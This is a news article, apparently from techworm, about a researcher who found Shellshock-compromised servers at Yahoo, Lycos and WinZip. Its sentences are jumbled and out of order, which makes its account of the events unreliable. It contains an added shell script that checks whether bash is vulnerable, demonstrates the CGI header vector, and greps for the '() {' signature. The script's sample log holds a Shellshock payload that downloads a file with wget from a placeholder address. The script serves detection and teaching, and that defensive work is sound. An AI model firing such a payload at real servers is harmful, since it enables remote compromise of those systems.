These unknown hackers then used those hacked servers to probe for other potential victims.
He has since become a full-time white-hat researcher, engineer and consultant.
The box that was probing me was actually a server on the winzip.com domain.
A crafted web request to a vulnerable CGI application could run arbitrary commands on the server.
DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server.
This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
These are only a few of the vectors; the bug can be exploited in many more ways.
The problem is, it doesn't.
Once again, this is for function definition only.
That's not as uncommon as you might think.
The next execution of bash will result in the arbitrary code being executed.
Knowing this, finding attack vectors was actually very easy.
Successful exploitation has been achieved through many vectors, not limited to just web scripts.
It's a shame I'm not malicious; I'd have hijacked a ton of bitcoins.
Everything past that point gets executed.
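The CGI vector and the parsing behaviour described above, as an added example that is not part of the article or of Hall's blog: a POSIX shell script that checks whether the bash in PATH still executes the trailing command from an exported function definition, shows how a web server copying a request header into an environment variable turns that into the CGI vector, and counts the `() {` signature in a constructed access-log sample. The function names `shellshock_status`, `cgi_vector` and `shellshock_hits`, the log lines and the addresses in them are assumptions for illustration, not anything from the page.

```shell
#!/bin/sh
# Added example (not from the article or from Hall's blog).
# Demonstrates the Shellshock (CVE-2014-6271 class) behaviour described above:
# a bash that imports "() { ...; }; <trailing commands>" from its environment
# and runs the trailing commands instead of stopping at the closing brace.

# 1. Is the bash in PATH still vulnerable?  Returns "vulnerable" or "patched".
shellshock_status() {
    # The variable value is a function definition followed by an extra command.
    # A fixed bash ignores the definition (and warns on stderr); a vulnerable
    # one executes the trailing "echo" while importing the environment, i.e.
    # before the -c script even starts.
    out=$(env x='() { :; }; echo SHELLSHOCK_MARKER' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_MARKER*) echo vulnerable ;;
        *)                   echo patched ;;
    esac
}

# 2. The CGI vector.  A CGI-capable web server copies request headers into the
# handler's environment (User-Agent becomes HTTP_USER_AGENT).  If the handler
# is a bash script, or anything that shells out to bash, the header value is
# parsed exactly like the variable in shellshock_status, as the server's user.
# $1 is the attacker-controlled header value (hypothetical handler).
cgi_vector() {
    HTTP_USER_AGENT="$1" bash -c 'echo "handler ran"' 2>/dev/null
}

# 3. Hunting for it in logs.  Constructed sample access-log lines (RFC 5737
# addresses; not real traffic).  The first carries the "() {" signature that
# every Shellshock probe must contain; the second is benign.
SAMPLE_LOG='192.0.2.10 - - [25/Sep/2014:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :; }; /bin/bash -c wget http://203.0.113.5/x -O /tmp/x"
198.51.100.7 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

# Count log lines carrying the function-definition prefix (fixed-string match,
# so the parentheses and brace are not treated as regex metacharacters).
shellshock_hits() {
    printf '%s\n' "$SAMPLE_LOG" | grep -cF '() {'
}

echo "local bash: $(shellshock_status)"
echo "suspicious requests in sample log: $(shellshock_hits)"
```

On a patched bash the probe prints only "patched" and the CGI handler prints only "handler ran" (with a warning on stderr about the ignored function definition); on a vulnerable one the injected command runs before the handler's own code. The log check is the cheap signature a defender can grep for: any Shellshock probe has to put `() {` at the start of some header value, so a fixed-string match over the User-Agent, Referer or Cookie fields catches the common scanners.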
Before I knew it, I was getting an onslaught of boxes connecting left and right.
According to him, this can only be done through the Shellshock vulnerability.
Normally hackers breach servers either to steal data or to launch DDoS attacks against their perceived enemies.
Hall noticed that the hackers used Romanian to communicate among themselves.
Hall stated in his blog post that the hackers are working towards compromising the Yahoo!
Hall alerted all three companies: Yahoo, Lycos and WinZip.
Out of the three, only Yahoo confirmed the vulnerability and the hack.
Lycos and WinZip are yet to confirm the hack.
Hall has also asked the FBI to look into the hacks, and the FBI is now investigating the matter.
PS: Jonathan Hall's Future South blog may take a long time to open due to server load.
source: www.techworm.net